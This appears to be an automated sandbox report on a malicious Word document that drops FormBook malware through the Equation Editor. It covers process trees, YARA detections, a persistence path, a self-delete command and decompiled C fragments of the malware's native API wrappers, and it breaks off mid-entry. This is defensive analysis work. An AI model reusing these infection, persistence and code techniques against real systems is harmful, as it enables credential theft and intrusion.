                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                            Code Manipulations

                                                                                                                                                            Statistics

                                                                                                                                                            CPU Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Memory Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            Analysis Process: WINWORD.EXE PID: 1776 Parent PID: 584

                                                                                                                                                            General

                                                                                                                                                            Start time:08:43:37
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                            Imagebase:0x13fda0000
                                                                                                                                                            File size:1424032 bytes
                                                                                                                                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Analysis Process: EQNEDT32.EXE PID: 2372 Parent PID: 584

                                                                                                                                                            General

                                                                                                                                                            Start time:08:43:38
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:543304 bytes
                                                                                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Analysis Process: skypound83892.exe PID: 1520 Parent PID: 2372

                                                                                                                                                            General

                                                                                                                                                            Start time:08:43:40
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\skypound83892.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\skypound83892.exe
                                                                                                                                                            Imagebase:0x90000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            Reputation:low

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Analysis Process: EQNEDT32.EXE PID: 2804 Parent PID: 584

                                                                                                                                                            General

                                                                                                                                                            Start time:08:43:59
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:543304 bytes
                                                                                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Analysis Process: skypound83892.exe PID: 960 Parent PID: 1520

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:02
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\skypound83892.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\skypound83892.exe
                                                                                                                                                            Imagebase:0x90000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            Reputation:low

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Analysis Process: explorer.exe PID: 1388 Parent PID: 960

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:04
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:
                                                                                                                                                            Imagebase:0xffca0000
                                                                                                                                                            File size:3229696 bytes
                                                                                                                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Analysis Process: firefos.exe PID: 2992 Parent PID: 1388

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:18
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Analysis Process: firefos.exe PID: 2872 Parent PID: 1388

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:26
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Analysis Process: NAPSTAT.EXE PID: 2016 Parent PID: 1388

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:30
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:279552 bytes
                                                                                                                                                            MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Analysis Process: cmd.exe PID: 172 Parent PID: 2016

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:35
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:/c del 'C:\Users\user\AppData\Roaming\skypound83892.exe'
                                                                                                                                                            Imagebase:0x4a770000
                                                                                                                                                            File size:302592 bytes
                                                                                                                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Analysis Process: firefos.exe PID: 2336 Parent PID: 2992

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:47
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Analysis Process: firefos.exe PID: 2840 Parent PID: 2872

                                                                                                                                                            General

                                                                                                                                                            Start time:08:45:19
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Disassembly

                                                                                                                                                            Code Analysis

                                                                                                                                                            Reset < >

                                                                                                                                                              Analysis Process: skypound83892.exe PID: 960 Parent PID: 1520 skypound83892.exeCOMMON

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                                                                                              0x00418273
                                                                                                                                                              0x0041827f
                                                                                                                                                              0x00418287
                                                                                                                                                              0x00418292
                                                                                                                                                              0x004182ad
                                                                                                                                                              0x004182b5
                                                                                                                                                              0x004182b9

                                                                                                                                                              APIs
                                                                                                                                                              • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID: R=A$R=A
                                                                                                                                                              • API String ID: 2738559852-3742021989
                                                                                                                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                              • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                                                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                              • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041826B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35filenativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 23%
                                                                                                                                                              			E0041826B(char __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t19;
				void* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t32;

				asm("out 0xc3, al");
				 *0x8bec8b55 = __eax;
				_t14 = _a4;
				_t30 = _a4 + 0xc48;
				E00418DC0(_t28, _a4, _t30,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t19 =  *((intOrPtr*)( *_t30))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t29, _t32); // executed
				return _t19;
			}








                                                                                                                                                              0x0041826b
                                                                                                                                                              0x0041826f
                                                                                                                                                              0x00418273
                                                                                                                                                              0x0041827f
                                                                                                                                                              0x00418287
                                                                                                                                                              0x00418292
                                                                                                                                                              0x004182ad
                                                                                                                                                              0x004182b5
                                                                                                                                                              0x004182b9

                                                                                                                                                              APIs
                                                                                                                                                              • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID: R=A$R=A
                                                                                                                                                              • API String ID: 2738559852-3742021989
                                                                                                                                                              • Opcode ID: 3df05c6fe35360bb7dd9194cf5117fff748ab97a6246caca3ee4fcb3d44ba0ab
                                                                                                                                                              • Instruction ID: 29863c55ec3654fb31e14fd286cf64c36a0a3c4f9a7f9d4f48c50ef14b18a2b7
                                                                                                                                                              • Opcode Fuzzy Hash: 3df05c6fe35360bb7dd9194cf5117fff748ab97a6246caca3ee4fcb3d44ba0ab
                                                                                                                                                              • Instruction Fuzzy Hash: 1AF01DB6204144AFCB04DFA9D890CEB77E9EF8C214B15875DFD5D93202C634E855CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                                                              0x00409b3c
                                                                                                                                                              0x00409b3f
                                                                                                                                                              0x00409b44
                                                                                                                                                              0x00409b49
                                                                                                                                                              0x00409b53
                                                                                                                                                              0x00409b58
                                                                                                                                                              0x00409b5b
                                                                                                                                                              0x00409b5d
                                                                                                                                                              0x00409b65
                                                                                                                                                              0x00409b6a
                                                                                                                                                              0x00409b6a
                                                                                                                                                              0x00409b71
                                                                                                                                                              0x00409b79
                                                                                                                                                              0x00409b7c
                                                                                                                                                              0x00409b7e
                                                                                                                                                              0x00409b92
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409b94
                                                                                                                                                              0x00409b9a
                                                                                                                                                              0x00409b4e
                                                                                                                                                              0x00409b4e
                                                                                                                                                              0x00409b4e

                                                                                                                                                              APIs
                                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Load
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                                              • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                              • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                                                                                              • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                              • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                                                              0x004181cf
                                                                                                                                                              0x004181d7
                                                                                                                                                              0x0041820d
                                                                                                                                                              0x00418211

                                                                                                                                                              APIs
                                                                                                                                                              • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                              • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                                                                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                              • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004181BB, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E004181BB(void* __eax, void* __ecx, void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t25;

				asm("stosb");
				_t19 = _a4;
				_t6 = _t19 + 0xc40; // 0xc40
				E00418DC0(__edi, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t25 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t25;
			}




                                                                                                                                                              0x004181bd
                                                                                                                                                              0x004181c3
                                                                                                                                                              0x004181cf
                                                                                                                                                              0x004181d7
                                                                                                                                                              0x0041820d
                                                                                                                                                              0x00418211

                                                                                                                                                              APIs
                                                                                                                                                              • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                              • Opcode ID: 19dde4529df738f92bf84e81a2c4b6cd612314efcab7e27918aad0b5c64d8a97
                                                                                                                                                              • Instruction ID: e734eda6658808a1bd32a1d4e6f71ea5f796a94c7d60e04da3eee2075b7717f5
                                                                                                                                                              • Opcode Fuzzy Hash: 19dde4529df738f92bf84e81a2c4b6cd612314efcab7e27918aad0b5c64d8a97
                                                                                                                                                              • Instruction Fuzzy Hash: 50F03CB2204149ABCB08DF98DC84CEB7BE9BF8C314B14864DFA5D93201D630E851CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041839D, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0041839D(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t23;

				_t12 = _a4;
				_t3 = _t12 + 0xc60; // 0xca0
				E00418DC0(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}





                                                                                                                                                              0x004183a3
                                                                                                                                                              0x004183af
                                                                                                                                                              0x004183b7
                                                                                                                                                              0x004183d9
                                                                                                                                                              0x004183dd

                                                                                                                                                              APIs
                                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                                                              Memory Dump Source
